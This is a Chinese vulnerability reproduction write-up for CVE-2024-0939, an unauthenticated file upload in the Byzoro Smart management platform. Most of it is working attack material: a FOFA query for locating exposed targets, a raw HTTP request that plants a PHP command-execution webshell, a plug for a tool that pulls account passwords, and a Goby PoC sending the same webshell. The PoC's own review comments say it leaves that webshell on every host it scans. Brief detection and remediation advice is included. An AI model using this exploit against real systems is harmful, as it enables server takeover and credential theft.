一、 产品简介
百卓Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品。百卓网络是一家致力于构建下一代安全互联网的高科技企业。
二、 漏洞概述
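百卓Smart管理平台 /Tool/uploadfile.php 接口存在任意文件上传漏洞(CVE-2024-0939)。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。从下文请求可以看出,该接口直接接受请求中提交的文件内容和保存路径(txt_path 参数)。排查时可在 Web 访问日志中检索对 /Tool/uploadfile.php 的 POST 请求,并核对 Web 目录下是否出现异常新增的 PHP 文件。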
三、 影响范围
smart s210
smart s210 firmware
四、 复现环境
FOFA:title=“Smart管理平台”
五、 漏洞复现
poc
POST /Tool/uploadfile.php? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Upgrade-Insecure-Requests: 1
Connection: close
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="1.php"
Content-Type: application/octet-stream
<?php system($_GET["c"]);?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
/home/rce.php
-----------------------------13979701222747646634037182887--
手动复现
验证
小龙验证
当然,如果你已经厌倦了手工
可以用小龙的POC,自动检测并且提取账号密码
小龙POC这里依然还是顶着干
小龙POC开源传送门: 小龙POC工具
小龙POCexe传送门: 小龙POC工具
发现漏洞很多啊,扫3个出来三个
Goby验证
我们不妨编写一个 Goby 的 PoC 文件(Go 源文件,内嵌 JSON 规则)来进行验证
poc
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
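// init registers the Goby check for the Byzoro Smart management platform
// uploadfile.php file upload issue (CVE-2024-0939) with ExpManager when the
// package is loaded. The JSON definition below is handed to NewExploit
// together with the current file name. The two trailing arguments are nil,
// which presumably means no custom Go scan/exploit callbacks are attached;
// confirm against NewExploit.
//
// Changes from the original definition: CVEIDs now carries the identifier
// that Name already cites, and Description, Impact and Recommendation are
// filled in (top level and both translations) so a finding is actionable for
// whoever triages it.
//
// NOTE(review): points left unchanged because they need a decision by the
// rule's owner:
//   - The scan request writes a PHP file that executes a request parameter
//     to the txt_path location, and nothing in this rule removes it. Every
//     host the check runs against is left with that file in place. A
//     detection rule should write an inert marker and the file must be
//     cleaned up after testing.
//   - FofaQuery and GobyQuery select on port 8443 only, not on a product
//     fingerprint, so the write request is presumably sent to unrelated
//     services on that port as well.
//   - ResponseTest only checks for status 200 and the substring "uploadfile"
//     in the body. It does not confirm that a file was stored, so false
//     positives are likely.
//   - ExploitSteps requests /test.php, which nothing in ScanSteps refers to.
//     With HasExp set to false this looks like unused template residue.
func init() {
	expJson := `{
  "Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
  "Description": "百卓Smart管理平台 /Tool/uploadfile.php 接口存在任意文件上传漏洞,未经身份验证即可向服务器上传文件。",
  "Product": "",
  "Homepage": "",
  "DisclosureDate": "2024-02-07",
  "PostTime": "2024-02-07",
  "Author": "597146595@qq.com",
  "FofaQuery": "port=\"8443\"",
  "GobyQuery": "port=\"8443\"",
  "Level": "3",
  "Impact": "未经身份验证的攻击者可上传恶意文件并执行任意指令,从而获得服务器权限并操纵服务器文件。",
  "Recommendation": "限制管理平台仅对可信管理网络开放,禁止未授权访问 /Tool/uploadfile.php;联系厂商获取修复版本并升级固件;排查 Web 目录中是否存在异常新增的 PHP 文件。",
  "References": [],
  "Is0day": false,
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/Tool/uploadfile.php",
        "follow_redirect": true,
        "header": {
          "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
          "Accept-Encoding": "gzip, deflate",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
          "Connection": "close",
          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
          "Content-Type": "multipart/form-data; boundary=---------------------------13979701222747646634037182887",
          "Upgrade-Insecure-Requests": "1"
        },
        "data_type": "text",
        "data": "-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"1.php\"\nContent-Type: application/octet-stream\n\n<?php system($_GET[\"c\"]);?>\n-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/rce.php\n-----------------------------13979701222747646634037182887--"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "uploadfile",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [],
  "VulType": [],
  "CVEIDs": [
    "CVE-2024-0939"
  ],
  "CNNVD": [
    ""
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "",
  "Translation": {
    "CN": {
      "Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
      "Product": "",
      "Description": "百卓Smart管理平台 /Tool/uploadfile.php 接口存在任意文件上传漏洞,未经身份验证即可向服务器上传文件。",
      "Recommendation": "限制管理平台仅对可信管理网络开放,禁止未授权访问 /Tool/uploadfile.php;联系厂商获取修复版本并升级固件;排查 Web 目录中是否存在异常新增的 PHP 文件。",
      "Impact": "未经身份验证的攻击者可上传恶意文件并执行任意指令,从而获得服务器权限并操纵服务器文件。",
      "VulType": [],
      "Tags": []
    },
    "EN": {
      "Name": "Byzoro Smart Management Platform Upload Vulnerability CVE-2024-0939",
      "Product": "",
      "Description": "The /Tool/uploadfile.php interface of the Byzoro Smart management platform accepts file uploads without authentication.",
      "Recommendation": "Restrict the management interface to trusted administration networks and block unauthenticated access to /Tool/uploadfile.php; obtain fixed firmware from the vendor and upgrade; review the web directories for unexpected new PHP files.",
      "Impact": "An unauthenticated attacker can upload a malicious file and execute arbitrary commands, gaining control of the server and its files.",
      "VulType": [],
      "Tags": []
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}`

	// The file name is used as the first NewExploit argument; the JSON above
	// carries the whole rule.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}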
测试效果如图